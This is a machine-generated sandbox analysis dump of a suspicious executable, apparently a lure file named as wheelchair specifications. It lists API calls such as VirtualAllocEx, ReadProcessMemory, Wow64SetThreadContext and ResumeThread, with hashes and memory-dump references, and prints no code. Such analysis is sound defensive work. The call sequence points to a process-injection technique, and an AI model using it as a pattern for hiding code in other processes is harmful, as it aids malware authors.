                    • Opcode ID: 629c49711d4f69170a7345e8a62219e9e7ebd6e5395c704f88a7fe7b23bc13cc
                    • Instruction ID: d28e3bca2366674f88eaab5ff19448f237396e10e2a0465530f2ad720790a4ef
                    • Opcode Fuzzy Hash: 629c49711d4f69170a7345e8a62219e9e7ebd6e5395c704f88a7fe7b23bc13cc
                    • Instruction Fuzzy Hash: 7B213A71D002098FDB10DFAAC4857EEBFF5EF58320F54842AD419A7241DB78A944CFA1
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D596,?,?,?,?,?), ref: 0270D657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: fa737fbdd40e6ad3a01e67754c06d6fd8cb551627438beb1de836792d0f3a466
                    • Instruction ID: 9075b032b190a4d2d04fb0dcf3bf228f5346a606f4cca80d0d46f5ca2a8a3d78
                    • Opcode Fuzzy Hash: fa737fbdd40e6ad3a01e67754c06d6fd8cb551627438beb1de836792d0f3a466
                    • Instruction Fuzzy Hash: 2221E3B5900348DFDB10CF9AD984ADEBBF8EB48320F14801AE918B3350D375A944DFA4
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0270D596,?,?,?,?,?), ref: 0270D657
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 0a6da1dacc8f39a2b32eab2522cb8fc2b7e0d8b0343e9e793d1a911cf42d889e
                    • Instruction ID: 09f3d499fa8c1f1227ba43ddd4aca518db3924e303ebbf4843d7d9f773ffdb8f
                    • Opcode Fuzzy Hash: 0a6da1dacc8f39a2b32eab2522cb8fc2b7e0d8b0343e9e793d1a911cf42d889e
                    • Instruction Fuzzy Hash: 6D21E4B5900209DFDB10CFAAD985ADEBFF5EB48320F14801AE918A3350D374A944CFA4
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04766D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 78428eeb676fdb4b5f30d4de7884fb8e22f76953bf27bf5ea5543681522e6f89
                    • Instruction ID: 2ef4fc964b150a2eeb398041f9074af673362c2aa432110fbe11e3428379d737
                    • Opcode Fuzzy Hash: 78428eeb676fdb4b5f30d4de7884fb8e22f76953bf27bf5ea5543681522e6f89
                    • Instruction Fuzzy Hash: 96213871D002098FDB10DFAAC4857AEBBF5EF48320F54842AD819A7241DB78A944CFA1
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04767000
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: a3edf69ba27aa27a0494265a089ec59d2004bffa7930bb5126e260d45c2818f5
                    • Instruction ID: 34c391de6bb1aad83f154a8d484c137620eef0773fadbd96585dc9c8006c5137
                    • Opcode Fuzzy Hash: a3edf69ba27aa27a0494265a089ec59d2004bffa7930bb5126e260d45c2818f5
                    • Instruction Fuzzy Hash: F8213AB1C003499FDB10CFAAC881AEEFBF5FF48320F10842AE919A7250D7759940DBA0
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04766E3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 54203f4ce7d1db94568583a11ca7f6dfc06758841d964ec0774ddff735b25524
                    • Instruction ID: fda23c72303f9ebf6716144e62683e1a13f0f15a6c393845b400ca9d39f75c01
                    • Opcode Fuzzy Hash: 54203f4ce7d1db94568583a11ca7f6dfc06758841d964ec0774ddff735b25524
                    • Instruction Fuzzy Hash: DF116A76900249DFDB20CFAAD844ADFBFF5EF58320F14841AE919A7250CB75A944CFA0
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270AFB9,00000800,00000000,00000000), ref: 0270B1CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 5a8284407b835e055589384a550743e393fd096eebf051dcdd9ed7d0d3b542f2
                    • Instruction ID: 117dc52e1a09cc9be71b7291d7b17c4b910f5e48d650c3c150d1acaeeec9a3a0
                    • Opcode Fuzzy Hash: 5a8284407b835e055589384a550743e393fd096eebf051dcdd9ed7d0d3b542f2
                    • Instruction Fuzzy Hash: 721117B6900309DFDB10CF9AD984A9EFBF4EB48314F10842EE519B7250C375A944CFA4
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0270AFB9,00000800,00000000,00000000), ref: 0270B1CA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 1afb53dc6251338e4dbbafb4d8369bcda904659e3ca6d694118ad9fde0ac2d08
                    • Instruction ID: 9c8be376db0fb7ace9426c36d187e328b99b11322864bb68fcbb01e4c427a888
                    • Opcode Fuzzy Hash: 1afb53dc6251338e4dbbafb4d8369bcda904659e3ca6d694118ad9fde0ac2d08
                    • Instruction Fuzzy Hash: 5111F6B6D00209CFDB10CF9AD984ADEFBF4EB88314F14842ED519A7640C375AA45CFA5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: d5572c01a9f3fb79ecee77944eb3b32fdc2af142d785cb89ba2ba33177986d68
                    • Instruction ID: 84cf87ef81ad6abfb200164430eb985132c9dc490fda691af292b22463c65939
                    • Opcode Fuzzy Hash: d5572c01a9f3fb79ecee77944eb3b32fdc2af142d785cb89ba2ba33177986d68
                    • Instruction Fuzzy Hash: 71115B75D002088FDB20DFAAD8457DFFFF9EB98320F14841AD419A7340CA75A944CBA4
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04766E3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: a464dbfa6b021848c08b9aa6bb5944c24c11c1c5235a1b878d1e2dd644c49e1a
                    • Instruction ID: 7b9882f219c686f8e23175035355cd2b3a995d63dc27d32045f5d8da32f3b6a4
                    • Opcode Fuzzy Hash: a464dbfa6b021848c08b9aa6bb5944c24c11c1c5235a1b878d1e2dd644c49e1a
                    • Instruction Fuzzy Hash: 01113A759002499FDB10DFAAC844ADFBFF5EF58320F14841AE515A7250C775A944DFA0
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 052955830f3efd692f6f4bd6684a12fbadf17a49ab745f529aff5e83e5b921ab
                    • Instruction ID: bc3228c8732facd8e4fec5ef3f2ed2ecab79e7732e73c28e20834a8239ed6c0f
                    • Opcode Fuzzy Hash: 052955830f3efd692f6f4bd6684a12fbadf17a49ab745f529aff5e83e5b921ab
                    • Instruction Fuzzy Hash: 611113B6C00349CFDB10CF9AD584ADEFBF4EB88324F10845AD519A7650C379A549CFA1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: cf220e6c268cb0d850f77546e5787904aa7957de9e3837361da4f19a5b6d58e7
                    • Instruction ID: 0f5bca41aac668a65281062eede65b1999ad58fa39adb0e8c421b81b70ec1bb5
                    • Opcode Fuzzy Hash: cf220e6c268cb0d850f77546e5787904aa7957de9e3837361da4f19a5b6d58e7
                    • Instruction Fuzzy Hash: F8113AB1D002498FDB20DFAAC94579EFBF9EF88320F14841AD519A7340CB75A944CFA4
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0270AF3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: dc1254496dc848b3d9e9fce4e61a51e9ff19ec35a4a9ecfa4305ca49549d7b9e
                    • Instruction ID: ddb793075f671fd0a9ed7b03cc8caf3e6c6fe7be5d4d5ca160ab87d3e08af1cd
                    • Opcode Fuzzy Hash: dc1254496dc848b3d9e9fce4e61a51e9ff19ec35a4a9ecfa4305ca49549d7b9e
                    • Instruction Fuzzy Hash: 911113B6C00349CFDB10CF9AD544ADEFBF4EB88324F10845AD518A7250C379A549CFA1
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0476B9D5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: f5db0c573e6a28403c8f2a49a81488eb366309a6dfcbb79243c887ad17ae7403
                    • Instruction ID: a9ec74403a9800e9b0ee2c80a3d81bea809d0af57114b4156ea08f4c7f6799e2
                    • Opcode Fuzzy Hash: f5db0c573e6a28403c8f2a49a81488eb366309a6dfcbb79243c887ad17ae7403
                    • Instruction Fuzzy Hash: 3F1106B5800349DFDB10CF9AC985BDEBBF8EB58320F10841AE919A7301C375A944CFA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: (iq
                    • API String ID: 0-3943945277
                    • Opcode ID: 48ff151528e0c61aefc6e5f6186f53d1aafc75f74e57ae7e854e8756c4f05d51
                    • Instruction ID: 08125284c8f4a9cba3714a4e3e8129e2deab405e5cde1e39c199564a6b60c1e9
                    • Opcode Fuzzy Hash: 48ff151528e0c61aefc6e5f6186f53d1aafc75f74e57ae7e854e8756c4f05d51
                    • Instruction Fuzzy Hash: D4919D70B002158FDB55EF69D494AAEBBF6FF89300B1485ADD406AB3A5DB30EC45CB90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Hiq
                    • API String ID: 0-3823623015
                    • Opcode ID: 4bb5e0a1e2b4d06a1083f669b10008c531963ba6b300664c888797cbc972da5d
                    • Instruction ID: 1d5b231b893d30dea91c406637a2c5efa9821c305dc14966273caf4c5a269e2a
                    • Opcode Fuzzy Hash: 4bb5e0a1e2b4d06a1083f669b10008c531963ba6b300664c888797cbc972da5d
                    • Instruction Fuzzy Hash: 0C916474A002199FCB05DFA4D4949EEB7F6FF89300B14806AE909EB361E735ED06CB51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: d8jq
                    • API String ID: 0-124307943
                    • Opcode ID: 4e570cff0aa4e83ff86cf56926a4f663e23740f13786f83c768fd9cdaa5577d7
                    • Instruction ID: 20d4c80d63708a9159a7e0b03347692fe312c5e2058d0fe70e942d31b43a57ba
                    • Opcode Fuzzy Hash: 4e570cff0aa4e83ff86cf56926a4f663e23740f13786f83c768fd9cdaa5577d7
                    • Instruction Fuzzy Hash: B6617CB4B101199FCB15DF68D958AEE7BB6FF89311F14846AE806A7390DB70DC41CBA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Teeq
                    • API String ID: 0-348098666
                    • Opcode ID: 44f505b2d2748dc516bede964b6b8fa0e2d9fc715cfd68f6ed8591915184978c
                    • Instruction ID: 5e78073b0d575c286249c1e8f7eefc4d69377041113cd48d9053b3db3387af9c
                    • Opcode Fuzzy Hash: 44f505b2d2748dc516bede964b6b8fa0e2d9fc715cfd68f6ed8591915184978c
                    • Instruction Fuzzy Hash: 7651C3B5B002068FCB11EBB9D8484AEBBF6FFC4350724856AE459DB351DF309D068BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'eq
                    • API String ID: 0-1552367303
                    • Opcode ID: 7c3d59754b970a83273325bd24eaccedf0a4ba0655f34ab21fa1a8ec927d3919
                    • Instruction ID: 509789e5c03d4c5e6b2b7cbd92601068849dd3c8bc6fe09c8544a3c020dbcaec
                    • Opcode Fuzzy Hash: 7c3d59754b970a83273325bd24eaccedf0a4ba0655f34ab21fa1a8ec927d3919
                    • Instruction Fuzzy Hash: 8811037491A3C4AFC703EB74EA2148DBFB1AF42200B1446DBE445DB2A3DB381A19CB52
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Teeq
                    • API String ID: 0-348098666
                    • Opcode ID: 22755a9723693aa1af5d7113a01531723be001ff7497b3d7ab302046d8e610e0
                    • Instruction ID: 456518252993bfa45d1ffa7dae29019f1d6f3ef54ee290181315b3e3fee6ac16
                    • Opcode Fuzzy Hash: 22755a9723693aa1af5d7113a01531723be001ff7497b3d7ab302046d8e610e0
                    • Instruction Fuzzy Hash: 30111CB1F0020B8BDB54EBB999155EFB6F6BF88210B60447AC504E7344EF359E05CBA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: d8jq
                    • API String ID: 0-124307943
                    • Opcode ID: 41f4885868786e3e9e73b40916c230987c8b447af2b73e20744ef153a14cc25b
                    • Instruction ID: 3875d7049c681e6897c292a57612cd43fd15b4cbf0e3e375c95d93c6c74e5987
                    • Opcode Fuzzy Hash: 41f4885868786e3e9e73b40916c230987c8b447af2b73e20744ef153a14cc25b
                    • Instruction Fuzzy Hash: EC0124F5B102064FCB222A69E91CDEB7F99BF8125AF048477E90DC71C6EA70C81583A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4'eq
                    • API String ID: 0-1552367303
                    • Opcode ID: 7b76d0e69c7a40aebe1365362c761544b77659708147cf52dfe4dabd9a411183
                    • Instruction ID: 400eb1c6ae6d0f1341dd7cfba75790d05ec564ceb4e60fc86c0c36f52c6d02cf
                    • Opcode Fuzzy Hash: 7b76d0e69c7a40aebe1365362c761544b77659708147cf52dfe4dabd9a411183
                    • Instruction Fuzzy Hash: 2AF08C78A01209EFCB05FFB8E65545DBFB5FF84200B2085AAE80993260DF342E45CF45
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4599e64246ab442aed5fa14c12acfcf3c7a415f4b2aa3c44dd92d3d7726ed7c7
                    • Instruction ID: ec6859962189d8ec8e49ca7a1a16e896a3f6d1656876527cc6b0521297538430
                    • Opcode Fuzzy Hash: 4599e64246ab442aed5fa14c12acfcf3c7a415f4b2aa3c44dd92d3d7726ed7c7
                    • Instruction Fuzzy Hash: F66201B0D11F424BD7B0BF7895583DFBAE5EB89380F21491ED5EACE641DB3494828B41
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca87cfd763c215746fbb990e2b8728c20a2e38db39ff1f6f89112a30f9a564c2
                    • Instruction ID: 97758a1cada7c9a4343cd6bcf36b950eb61766ce63255dd0e3ad2c2e64f702b8
                    • Opcode Fuzzy Hash: ca87cfd763c215746fbb990e2b8728c20a2e38db39ff1f6f89112a30f9a564c2
                    • Instruction Fuzzy Hash: 1442E230D10619CFCF55EFA8C8486DCBBB1BF49300F5182A9D5497B265EB30AA99CF91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c44da43eae41d8bced2f74c98725890e631490aa03b66dbf2ab3a0ade7e39dff
                    • Instruction ID: 1af79bc7e1567442a77bb3707526bb3ba8d9363defce57ee9e2cc47464859968
                    • Opcode Fuzzy Hash: c44da43eae41d8bced2f74c98725890e631490aa03b66dbf2ab3a0ade7e39dff
                    • Instruction Fuzzy Hash: 7E223BB4D05F834BD7B4AB6886842DFE6D4EB89390F30495BC4FACE256E73490878B45
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0500ad170f0f5d26be574687ccf4dcabe26b9751ad9b6b280102941d4d984d2
                    • Instruction ID: 1f23fc39ffdd661e12666b3134f619a69d44cea0cb27c9dde582eacf41d5a471
                    • Opcode Fuzzy Hash: c0500ad170f0f5d26be574687ccf4dcabe26b9751ad9b6b280102941d4d984d2
                    • Instruction Fuzzy Hash: CDB1BC70E01209CFDB61EFA5D9846AEFBF2FF89300F20456AC105AB285DB399951CF81
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10f4cf2c7036f3fea5fb7dbedd943f736ebfa488dcda1602cccba33b6eff1637
                    • Instruction ID: 6f6c837cd1f3c1694aa4affe4e4cb4090938fb700f3ff5238e6076476ee73c08
                    • Opcode Fuzzy Hash: 10f4cf2c7036f3fea5fb7dbedd943f736ebfa488dcda1602cccba33b6eff1637
                    • Instruction Fuzzy Hash: 65E14A31E00619CFDB55EF68C8846ADF7B1FF45300F1485A9D91AEB261DB30AD85CB90
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88ffc945f412d2cdae91b8df5a2d94acf2ced2899a72c7cd20e4098351ded8c6
                    • Instruction ID: 0d61dac618abbff3d14a270ea46f21484aa209cc781a920759004d9285ad75c8
                    • Opcode Fuzzy Hash: 88ffc945f412d2cdae91b8df5a2d94acf2ced2899a72c7cd20e4098351ded8c6
                    • Instruction Fuzzy Hash: F2C19B74600B009FC715DF28C8489DABBE2FF89310B15C8AED45A8B761DB30EC49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7340d3d4c1742dfa8d21c94f17b688d308db4efba53579017e4b874d2a0f4c5d
                    • Instruction ID: af67d3458e64412102d2c47aefaf03cd7207cc3a59274f28ed0fdbbe66ea22fd
                    • Opcode Fuzzy Hash: 7340d3d4c1742dfa8d21c94f17b688d308db4efba53579017e4b874d2a0f4c5d
                    • Instruction Fuzzy Hash: 69C19F75600B009FC715DB78D8489DABBE2FF89310B15C9AED45A8B761DB30EC49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0507af811cfbbd545580e2f8b4c429b604413256314ebd55480a3fc4a47c2e4a
                    • Instruction ID: 7e6f5ffdc65892fca4268c91552b88289d29ebfdaec229acdb4377cb1f9866c4
                    • Opcode Fuzzy Hash: 0507af811cfbbd545580e2f8b4c429b604413256314ebd55480a3fc4a47c2e4a
                    • Instruction Fuzzy Hash: 2EC1AF75600B009FC715DB28C8489EABBF2FF89310B15C9ADD55A8B761DB31EC49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 714ef55bd02941a3971effea696691e9055f0690d3e1ae3f1c11938de01c3704
                    • Instruction ID: 0cb824ea75cdbef71380ff1ce65e45d0bef3df7252af9e9093ed815df8d961e7
                    • Opcode Fuzzy Hash: 714ef55bd02941a3971effea696691e9055f0690d3e1ae3f1c11938de01c3704
                    • Instruction Fuzzy Hash: 82C18E75600B009FC715DB78C8489DABBE2FF8A310B15C9AED45A8B761DB30ED49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca22eff8788a0ffe4246c8296126a65cacf31d0e952fe7ae4828ef54a0309a8d
                    • Instruction ID: 23d5d799b701f95a0cb41697ffe282ea7852a13769f6ca9a494b7e72bdd209e0
                    • Opcode Fuzzy Hash: ca22eff8788a0ffe4246c8296126a65cacf31d0e952fe7ae4828ef54a0309a8d
                    • Instruction Fuzzy Hash: B2B1B275600B009FC715DB38D8489EABBE2FF8A310B1589ADD45A8B761DB30EC49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 19ecd605857590fbd759c5e609e706e74a761e3a3114882b6eb3d5041b575d8a
                    • Instruction ID: bf847796900db4806558d42cfb5568b485ebcef2b78a351065db8614f17437c5
                    • Opcode Fuzzy Hash: 19ecd605857590fbd759c5e609e706e74a761e3a3114882b6eb3d5041b575d8a
                    • Instruction Fuzzy Hash: E0B1B175600B009FC715DB78C8889EABBF2FF89310B1489ADD45A9B761DB30AD45CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 686be1793a3a4e12170d85f9ea9ffac8c7560e8da59af2708d251ff2b8fd6975
                    • Instruction ID: 9cf5a866710d2ddaa2118ee97c041c061bbaf6acfc7c128815c874169ca9fe37
                    • Opcode Fuzzy Hash: 686be1793a3a4e12170d85f9ea9ffac8c7560e8da59af2708d251ff2b8fd6975
                    • Instruction Fuzzy Hash: 98B1B174604B009FC715DB78D8889EABBF2FF89310B1488ADD45A9B761DB30AD49CB91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5ede8465b1ec017362f620faa8eb6b21c92da9ccf438ea888ae32fb5aebd26f
